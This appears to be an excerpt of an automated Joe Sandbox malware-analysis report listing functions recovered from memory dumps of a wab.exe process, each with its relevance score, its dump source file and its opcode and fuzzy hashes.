                                                        • Opcode ID: 872235f722e3297b66d86ea8dac33a9702ad75b2f595d20bca9bb83b11084227
                                                        • Instruction ID: 4325ccb975c71bb3f1342c842a0adfc3283a808ad1cb1e349dfef8d9481731bf
                                                        • Opcode Fuzzy Hash: 872235f722e3297b66d86ea8dac33a9702ad75b2f595d20bca9bb83b11084227
                                                        • Instruction Fuzzy Hash: F1219F34B142128FDB59E768CF84B897B95EB5431CF004A65D006E737AEF39D985CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22241390 Relevance: .1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 54c35f8e4f03e84b1a7548698d3360b2cdd5747389ef8e5b0a1c2c42870bd156
                                                        • Instruction ID: 8395a60627d1f7001ed22fde7f3fd18711dcd729b13d9e291707be5f143266aa
                                                        • Opcode Fuzzy Hash: 54c35f8e4f03e84b1a7548698d3360b2cdd5747389ef8e5b0a1c2c42870bd156
                                                        • Instruction Fuzzy Hash: A2118174F003224BDB296764CA4435D3A95F71A329F401829E446FB6B9DE2ECAC4C781
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 222417C2 Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f4157a95178c21f333fdcea9a3684d2b783ef4975a2930263390f4b3d84e877e
                                                        • Instruction ID: 3b259a923d987d9583cda5a6b9a85ed9e8c7a40214dcbcc2abcc81b2b6c83364
                                                        • Opcode Fuzzy Hash: f4157a95178c21f333fdcea9a3684d2b783ef4975a2930263390f4b3d84e877e
                                                        • Instruction Fuzzy Hash: 1211387AF103125FDB05AB74490679E7BE5FB5C210F104429E945E3349DF398841C7C0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 2224148A Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 34ef338705930d40c87a9b877ac481552d9010138d58d6c45eff626b47384eac
                                                        • Instruction ID: d6437350a947ce10b04cef47d6d3dec80c731163ea0eb25fa46b5a08d940e077
                                                        • Opcode Fuzzy Hash: 34ef338705930d40c87a9b877ac481552d9010138d58d6c45eff626b47384eac
                                                        • Instruction Fuzzy Hash: 9C119D71E013268FCB19AFB48D413DE7BE0EB19254B500679D805FB259EF3AD942CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0298D4D3 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2925619133.000000000298D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0298D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_298d000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c00ff5ec2e29744080c8e4ca07c56d5aae589f0b8178e9ac1d3c5e2fd933a73b
                                                        • Instruction ID: 9305d934b2815fb632d8e6303474a0f9a24307f1c1e6abbf093d59cf7cebc472
                                                        • Opcode Fuzzy Hash: c00ff5ec2e29744080c8e4ca07c56d5aae589f0b8178e9ac1d3c5e2fd933a73b
                                                        • Instruction Fuzzy Hash: EE110372504240CFCB02DF10D5C4B16BFB1FB84318F28C2AADC090B25AC33AD45ACBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 222417D0 Relevance: .1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5036d151cca4bc573f828e93a3ef111500e8233c935d576c42048df149c56054
                                                        • Instruction ID: b250863a33b4990edfbbc7fd39cf6f13dc9f4f493c5ad3bdce921309ff6d48bd
                                                        • Opcode Fuzzy Hash: 5036d151cca4bc573f828e93a3ef111500e8233c935d576c42048df149c56054
                                                        • Instruction Fuzzy Hash: 1D01D279F103229FCB14ABB98908B5E7BE9FB8C660F100425E945E3358EF39C941CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22241498 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a1d77f69b7311e3cc5659862c4e2b6a942d60e870632d65347b9241c6a13296b
                                                        • Instruction ID: dac53ec380f008ba76c2634f963efa806b52f9baa9c109714aaa0f785308bfd5
                                                        • Opcode Fuzzy Hash: a1d77f69b7311e3cc5659862c4e2b6a942d60e870632d65347b9241c6a13296b
                                                        • Instruction Fuzzy Hash: 7E01A931E013258FCB19EFB8894029EBBF5EB58310B60057AD806E7245EE36D982CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 2224A6CA Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3ea0566a43cd559d8d7ff624f32d5376fcdcbf43625e5b7bf7fd05d55c8c88d
                                                        • Instruction ID: 1a027a53e4716db3388fa41946703f371ebe4e4036fecc89c9891db1e9fc371d
                                                        • Opcode Fuzzy Hash: b3ea0566a43cd559d8d7ff624f32d5376fcdcbf43625e5b7bf7fd05d55c8c88d
                                                        • Instruction Fuzzy Hash: 59019231A002048FDB04EF64DA94BDBFB62FF94310F54C264D8085F299EB74A94ACBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22247EA8 Relevance: .0, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1d20f95d60d13ec7f227d4929637b9669262277dffde7d4febd25abb89c4e890
                                                        • Instruction ID: f7dfc75175fb45843dffc09e1626c3c911e1ec3e33cb5aaa3d7778d5c0689c48
                                                        • Opcode Fuzzy Hash: 1d20f95d60d13ec7f227d4929637b9669262277dffde7d4febd25abb89c4e890
                                                        • Instruction Fuzzy Hash: A701D639B002058FDB19EB74C658BA877B2FB98625F1544A4E5069B2A8DF35AD82CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 22246C04 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1a5c84a876baccbe6d06550c11bddef624980fe578e409af2b2b55962569720c
                                                        • Instruction ID: 9ce863d7954c697dc6f72f56e04a744291ae018ee1b100a72d4dbd215b6f2c49
                                                        • Opcode Fuzzy Hash: 1a5c84a876baccbe6d06550c11bddef624980fe578e409af2b2b55962569720c
                                                        • Instruction Fuzzy Hash: C3C080377041504FC505973CE0544B837B1DFC912931401D6D144CF731CE135C02CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%